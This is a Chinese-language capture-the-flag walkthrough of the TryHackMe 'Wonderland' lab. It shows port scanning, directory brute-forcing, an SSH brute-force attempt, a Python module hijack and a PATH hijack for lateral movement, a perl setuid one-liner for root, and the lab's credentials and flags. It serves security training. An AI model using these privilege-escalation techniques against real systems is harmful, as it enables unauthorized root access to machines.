服务发现
┌──(rootkali)-[~]└─# nmap -sV -Pn 10.10.86.51Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 02:41 EDTNmap scan report for 10.10.132.163Host is up (0.33s latency).Not shown: 998 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 80.63 seconds目录爆破
┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -u "http://10.10.132.163" -e* -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -t 100 _|. _ _ _ _ _ _|_ v0.3.8(_||| _) (/_(_|| (_| )Extensions: * | HTTP method: get | Threads: 100 | Wordlist size: 220521Error Log: /root/dirsearch/logs/errors-21-09-16_02-08-56.logTarget: http://10.10.132.163[02:08:56] Starting: [02:08:59] 301 - 0B - /img -> img/[02:09:00] 200 - 402B - / [02:09:00] 301 - 0B - /r -> r/ [02:10:24] 301 - 0B - /poem -> poem/ [02:10:34] 301 - 0B - /http%3A%2F%2Fwww -> /http:/www[02:12:54] 301 - 0B - /http%3A%2F%2Fyoutube -> /http:/youtube [02:13:49] 301 - 0B - /http%3A%2F%2Fblogs -> /http:/blogs [02:13:57] 301 - 0B - /http%3A%2F%2Fblog -> /http:/blog[02:14:39] 301 - 0B - /%2A%2Ahttp%3A%2F%2Fwww -> /%2A%2Ahttp:/www [02:21:21] 301 - 0B - /http%3A%2F%2Fcommunity -> /http:/community [02:21:58] 301 - 0B - /http%3A%2F%2Fradar -> /http:/radar [02:23:23] 301 - 0B - /http%3A%2F%2Fjeremiahgrossman -> /http:/jeremiahgrossman [02:23:23] 301 - 0B - /http%3A%2F%2Fweblog -> /http:/weblog[02:23:27] 301 - 0B - /http%3A%2F%2Fswik -> /http:/swikhttp://10.10.132.163/r是一行文字
Keep Going."Would you tell me, please, which way I ought to go from here?"http://10.10.132.163/poem 是一首英文诗
The Jabberwocky'Twas brillig, and the slithy tovesDid gyre and gimble in the wabe;All mimsy were the borogoves,And the mome raths outgrabe.“Beware the Jabberwock, my son!The jaws that bite, the claws that catch!Beware the Jubjub bird, and shunThe frumious Bandersnatch!”He took his vorpal sword in hand:Long time the manxome foe he sought —So rested he by the Tumtum tree,And stood awhile in thought.And as in uffish thought he stood,The Jabberwock, with eyes of flame,Came whiffling through the tulgey wood,And burbled as it came!One, two! One, two! And through and throughThe vorpal blade went snicker-snack!He left it dead, and with its headHe went galumphing back.“And hast thou slain the Jabberwock?Come to my arms, my beamish boy!O frabjous day! Callooh! Callay!”He chortled in his joy.‘Twas brillig, and the slithy tovesDid gyre and gimble in the wabe;All mimsy were the borogoves,And the mome raths outgrabe.给进去的hint是:Everything is upside down here. 发现img/下有三张图片,alice_door有一行英文,无论倒过去还是侧面看都看不出来写的是什么
alice_door.jpgalice_door.pngwhite_rabbit_1.jpg谷歌搜寻可能是插画作者的落款,插画作者名字叫John Tenniel
尝试以alice为用户名爆破ssh,连贯被reset了,看来不让爆ssh
hydra -l alice -P /usr/share/wordlists/rockyou.txt 10.10.86.51ssh -v
爆破目录r/,失去http://10.10.132.163/r/a
Keep Going."That depends a good deal on where you want to get to," said the Cat.反复爆破,失去http://10.10.132.163/r/a/b
Keep Going."I don’t much care where—" said Alice.http://10.10.132.163/r/a/b/b
Keep Going."Then it doesn’t matter which way you go," said the Cat.http://10.10.132.163/r/a/b/b/i/
Keep Going."—so long as I get somewhere,"" Alice added as an explanation.http://10.10.132.163/r/a/b/b/...
Open the door and enter wonderland"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?""In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving the other paw, "lives a March Hare. Visit either you like: they’re both mad."在下面页面查看网页源代码发现一个相似登录凭证的货色
alice:HowDothTheLittleCrocodileImproveHisShiningTail胜利登录alice的ssh账号
┌──(rootkali)-[~]└─# ssh alice@10.10.86.51 130 ⨯alice@10.10.132.163's password: Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Sep 16 08:30:29 UTC 2021 System load: 0.0 Processes: 84 Usage of /: 18.9% of 19.56GB Users logged in: 0 Memory usage: 15% IP address for eth0: 10.10.132.163 Swap usage: 0%0 packages can be updated.0 updates are security updates.Last login: Mon May 25 16:37:21 2020 from 192.168.170.1alice@wonderland:~$ pwd/home/alicealice@wonderland:~$ lsroot.txt walrus_and_the_carpenter.pyalice@wonderland:~$ ls -alhtotal 40Kdrwxr-xr-x 5 alice alice 4.0K May 25 2020 .drwxr-xr-x 6 root root 4.0K May 25 2020 ..lrwxrwxrwx 1 root root 9 May 25 2020 .bash_history -> /dev/null-rw-r--r-- 1 alice alice 220 May 25 2020 .bash_logout-rw-r--r-- 1 alice alice 3.7K May 25 2020 .bashrcdrwx------ 2 alice alice 4.0K May 25 2020 .cachedrwx------ 3 alice alice 4.0K May 25 2020 .gnupgdrwxrwxr-x 3 alice alice 4.0K May 25 2020 .local-rw-r--r-- 1 alice alice 807 May 25 2020 .profile-rw------- 1 root root 66 May 25 2020 root.txt-rw-r--r-- 1 root root 3.5K May 25 2020 walrus_and_the_carpenter.pyalice@wonderland:~$ 发现有root flag,然而当然没有读权限,同目录还有一个python脚本
全局查找user.txt失败
查看home目录和/etc/passwd文件,除了alice以外,还有hatter rabbit tryhackme三个用户,然而alice用户都没有进入这三个用户主目录的权限,看来是须要横向提权?
查找所有蕴含hatter rabbit tryhackme字样的文件,没啥发现
find / |xargs grep -ri 'hatter' -l >hatter.txt find / |xargs grep -ri 'rabbit' -l >rabbit.txt find / |xargs grep -ri 'tryhackme' -l >tryhackme.txt上传linpease,枚举提权破绽,发现能够利用perl晋升到root权限
Files with capabilities (limited to 50):/usr/bin/perl5.26.1 = cap_setuid+ep/usr/bin/mtr-packet = cap_net_raw+ep/usr/bin/perl = cap_setuid+ep然而alice自身没有执行/usr/bin/perl的权限,而用户hatter能够,也就是咱们须要先提权到hatter
alice@wonderland:/etc/ldap$ ll /usr/bin/perl-rwxr-xr-- 2 root hatter 2097720 Nov 19 2018 /usr/bin/perl*user flag的提醒是Everything is upside down here.因为root.txt在/home/alice/root.txt,所以user.txt就是在/root/user.txt ,,这其实是一情理解题。。。
alice@wonderland:~$ cat /root/user.txtthm{"Curiouser and curiouser!"}用alice身份 sudo -l,发现walrus_and_the_carpenter.py跟rabbit是关联的
alice@wonderland:~$ sudo -l[sudo] password for alice: Matching Defaults entries for alice on wonderland: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser alice may run the following commands on wonderland: (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.pywalrus_and_the_carpenter.py源代码如下
import randompoem = """The sun was shining on the sea,Shining with all his might:He did his very best to makeThe billows smooth and bright —And this was odd, because it wasThe middle of the night.The moon was shining sulkily,Because she thought the sunHad got no business to be thereAfter the day was done —"It’s very rude of him," she said,"To come and spoil the fun!"The sea was wet as wet could be,The sands were dry as dry.You could not see a cloud, becauseNo cloud was in the sky:No birds were flying over head —There were no birds to fly.The Walrus and the CarpenterWere walking close at hand;They wept like anything to seeSuch quantities of sand:"If this were only cleared away,"They said, "it would be grand!""If seven maids with seven mopsSwept it for half a year,Do you suppose," the Walrus said,"That they could get it clear?""I doubt it," said the Carpenter,And shed a bitter tear."O Oysters, come and walk with us!"The Walrus did beseech."A pleasant walk, a pleasant talk,Along the briny beach:We cannot do with more than four,To give a hand to each."The eldest Oyster looked at him.But never a word he said:The eldest Oyster winked his eye,And shook his heavy head —Meaning to say he did not chooseTo leave the oyster-bed.But four young oysters hurried up,All eager for the treat:Their coats were brushed, their faces washed,Their shoes were clean and neat —And this was odd, because, you know,They hadn’t any feet.Four other Oysters followed them,And yet another four;And thick and fast they came at last,And more, and more, and more —All hopping through the frothy waves,And scrambling to the shore.The Walrus and the CarpenterWalked on a mile or so,And then they rested on a rockConveniently low:And all the little Oysters stoodAnd waited in a row."The time has come," the Walrus said,"To talk of many things:Of shoes — and ships — and sealing-wax —Of cabbages — and kings —And why the sea is boiling hot —And whether pigs have wings.""But wait a bit," the Oysters cried,"Before we have our chat;For some of us are out of breath,And all of us are fat!""No hurry!" said the Carpenter.They thanked him much for that."A loaf of bread," the Walrus said,"Is what we chiefly need:Pepper and vinegar besidesAre very good indeed —Now if you’re ready Oysters dear,We can begin to feed.""But not on us!" the Oysters cried,Turning a little blue,"After such kindness, that would beA dismal thing to do!""The night is fine," the Walrus said"Do you admire the view?"It was so kind of you to come!And you are very nice!"The Carpenter said nothing but"Cut us another slice:I wish you were not quite so deaf —I’ve had to ask you twice!""It seems a shame," the Walrus said,"To play them such a trick,After we’ve brought them out so far,And made them trot so quick!"The Carpenter said nothing but"The butter’s spread too thick!""I weep for you," the Walrus said."I deeply sympathize."With sobs and tears he sorted outThose of the largest size.Holding his pocket handkerchiefBefore his streaming eyes."O Oysters," said the Carpenter."You’ve had a pleasant run!Shall we be trotting home again?"But answer came there none —And that was scarcely odd, becauseThey’d eaten every one."""for i in range(10): line = random.choice(poem.split("\n")) print("The line was:\t", line)剖析源代码,看上去只是随机输入10行诗句,然而如果咱们在同目录创立一个random.py,并且py的代码如下,那么咱们执行时就能够拿到rabbit的shell。这实际上是利用了python的蕴含文件原理,如果同目录有同名文件,则优先蕴含同目录的,其次才去找库文件有没有同名文件
#random.pyimport osos.system("/bin/bash")执行
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.pyrabbit@wonderland:~$ whoamirabbit当初咱们拿到了rabbit的shell,在/home/rabbit目录,发现一个二进制文件teaParty,执行提醒
rabbit@wonderland:/home/rabbit$ ./teaParty Welcome to the tea party!The Mad Hatter will be here soon.Probably by Fri, 17 Sep 2021 07:42:14 +0000Ask very nicely, and I will give you some tea while you wait for himhello?Segmentation fault (core dumped)咱们把teaParty这个二进制文件传回kali攻击机,用strings命令查看(strings命令在对象文件或二进制文件中查找可打印的字符串。字符串是4个或更多可打印字符的任意序列,以换行符或空字符完结)
┌──(rootkali)-[~/tryhackme/wonderland]└─# strings teaParty/lib64/ld-linux-x86-64.so.22U~4libc.so.6setuidputsgetcharsystem__cxa_finalizesetgid__libc_start_mainGLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTableu/UH[]A\A]A^A_Welcome to the tea party!The Mad Hatter will be here soon./bin/echo -n 'Probably by ' && date --date='next hour' -RAsk very nicely, and I will give you some tea while you wait for himSegmentation fault (core dumped);*3$"GCC: (Debian 8.3.0-6) 8.3.0剖析上面这行代码
/bin/echo -n 'Probably by ' && date --date='next hour' -R
首先执行/bin/echo -n 'Probably by ',而后再执行date --date='next hour' -R,date这个命令没有指明门路,像下面的python文件一样,如果当前目录有这个文件,那就会执行这个文件,没有这个文件系统就会去$PATH查找是否有这个命令
查看以后$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin把tmp目录加进$PATH里
rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATHrabbit@wonderland:/home/rabbit$ echo $PATH/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin在/tmp下创立一个date文件,编写以下代码,并且chmod +x /tmp/date
#!/bin/bash/bin/bash再次执行,取得hatter的shell
rabbit@wonderland:/home/rabbit$ vim /tmp/daterabbit@wonderland:/home/rabbit$ chmod +x /tmp/date rabbit@wonderland:/home/rabbit$ ./teaPartyWelcome to the tea party!The Mad Hatter will be here soon.Probably by hatter@wonderland:/home/rabbit$ whoamihatterhatter@wonderland:/home/rabbit$ iduid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)在hatter目录拿到ssh明码
hatter@wonderland:/home/rabbit$ cat /home/hatter/password.txtWhyIsARavenLikeAWritingDesk?用ssh登录hatter账号拿到hatter的full shell,依据之前linpease枚举的后果利用perl晋升到root权限(参考https://gtfobins.github.io/gt...)
hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'# iduid=0(root) gid=1003(hatter) groups=1003(hatter)# cat /home/alice/root.txtthm{Twinkle, twinkle, little bat! How I wonder what you’re at!}总结
十分精彩的靶机,走了不少弯路,学习了通过援用文件进行提权的办法。